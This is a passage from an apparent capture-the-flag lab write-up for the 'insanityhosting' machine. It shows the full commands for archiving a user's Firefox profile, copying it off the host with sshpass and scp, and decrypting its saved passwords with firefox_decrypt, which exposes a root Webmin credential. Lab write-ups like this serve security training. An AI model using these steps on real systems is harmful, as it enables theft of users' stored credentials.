Firefox


A Firefox profile has been identified by PEAS on the insanityhosting.vm host.

It’s located in the home directory of the current user; elliot

[elliot@insanityhosting ~]$ tar -czf firefox.tar.gz .mozilla/firefox 
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/insanityhosting]
└─$ sshpass -p elliot123 scp elliot@insanityhosting.vm:~/firefox.tar.gz .
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/insanityhosting]
└─$ tar -xf firefox.tar.gz

Packaged and transferred to Kali

Decryption


Using a decryption tool found online.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/insanityhosting]
└─$ python3 ~/Tools/firefox_decrypt/firefox_decrypt.py .mozilla/firefox
Select the Mozilla profile you wish to decrypt
1 -> wqqe31s0.default
2 -> esmhp32w.default-default
2
 
Website:   https://localhost:10000
Username: 'root'
Password: 'S8Y389KJqWpJuSwFqFZHwfZ3GnegUa'

A credential for the internal Webmin instance identified; root:S8Y389KJqWpJuSwFqFZHwfZ3GnegUa This could also be a system credential for the root user. Validating..